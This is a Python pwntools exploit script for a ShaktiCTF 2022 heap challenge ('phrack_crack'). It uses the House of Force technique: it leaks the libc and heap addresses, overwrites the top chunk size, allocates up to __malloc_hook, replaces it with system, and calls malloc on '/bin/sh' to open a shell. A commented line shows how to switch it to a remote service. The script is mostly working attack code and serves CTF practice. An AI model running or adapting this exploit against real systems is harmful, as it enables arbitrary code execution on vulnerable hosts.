House of Force ShaktiCTF 2022
from pwn import *
import binascii
# Terminal command pwntools uses to open the debugger window when gdb.attach() is called.
context.terminal = "alacritty -e zsh -c".split()
# Heap: House of Force
# gdb hack
def _new_binary():
    """Return the debugger executable name pwntools' gdb module should spawn (gdb-gef)."""
    debugger_name = "gdb-gef"
    return debugger_name
# Route pwntools' gdb integration through the wrapper above so gdb-gef is used.
gdb.binary = _new_binary
#p = remote('',13377, level='debug')
# Local target process; the commented remote() line above is the switch for a live service.
p = process("./phrack_crack", level="debug")
elf = context.binary = ELF("phrack_crack")
# libc is located via the binary's RUNPATH entry; presumably fails if the binary has none — verify.
libc = ELF(elf.runpath + b"/libc.so.6")
def malloc(size, data):
    """Drive menu option 1 (allocate) on the module-level tube ``p``.

    Answers the three prompts in order: menu choice, ``size`` and ``data``.
    Every reply is sent with sendline, so a newline follows each value.
    """
    exchange = (
        (b"> ", b"1"),
        (b"size:", f"{size}"),
        (b"data:", data),
    )
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)
def edit(index, data):
    """Drive menu option 2 (edit) on the module-level tube ``p``.

    The menu choice and ``index`` are sent with sendline; the final ``data``
    payload is written with send, so no newline is appended to it and the
    caller controls the exact bytes that reach the program.
    """
    def answer(prompt, reply):
        p.recvuntil(prompt)
        p.sendline(reply)

    answer(b"> ", b"2")
    answer(b"index:", f"{index}")
    p.recvuntil(b"data:")
    p.send(data)
# leak libc & heap
# The program prints two hex addresses: the first is rebased against libc's
# puts symbol, the second is used to derive the heap base.
p.recvuntil(b"you! ")
libc_leak = p.readline().rstrip(b"\n")
libc_leak = int(libc_leak, 16)
libc.address = libc_leak - libc.sym.puts
#log.info(f"Libc Base: {hex(libc.address)}")
p.recvuntil(b"you: ")
heap_leak = p.readline().rstrip(b"\n")
heap_leak = int(heap_leak, 16)
# 0x220: distance of the leaked pointer from the heap base. Binary-specific
# constant from the author's analysis; presumably must be re-derived for any
# other build.
heap_base = heap_leak - 0x220
#log.info(f"Heap Base: {hex(heap_base)}")
# Attach gdb (window opened via context.terminal), follow the child after
# fork and break on free before continuing.
gdb.attach(p, '''
set follow-fork-mode child
b *free
continue
''')
# override top chunk size with 0xffffffffffffffff to allow huge allocations
malloc(24, b"A"*24)
# 24 filler bytes cover chunk 0's data; the following 8 bytes are the top
# chunk size field that edit() overwrites (edit() uses send, so nothing
# trailing is appended).
top_chunk_override = b"B"*(24) + p64(0xffffffffffffffff)
edit(0, top_chunk_override)
# allocate malloc hook
# it will not allocate at the target we give it, it will go from the base and allocate a big chunk that leads up to our malloc_hook
# 0x1330: binary-specific offset (author-derived); verify against the actual
# heap layout. NOTE(review): __malloc_hook exists only in older glibc builds;
# on a libc without that symbol the lookup below raises KeyError.
target = (libc.symbols['__malloc_hook'] - heap_base - 0x1330)
log.info(f"Heap base: {hex(heap_base)}")
log.info(f"Allocation size: {hex(target)}")
log.info(f"Heap base + allocation size: {hex(target+heap_base)}")
log.info(f"__malloc_hook: {hex(libc.symbols['__malloc_hook'])}")
malloc(target, b"")
# write system to malloc hook
malloc(8, p64(libc.symbols['system']))
# call malloc (will be system, so we can provide an arg)
# The requested size is the address of the "/bin/sh" string in libc, so it is
# passed through as the hooked call's first argument.
malloc(next(libc.search(b'/bin/sh')),"")
p.interactive()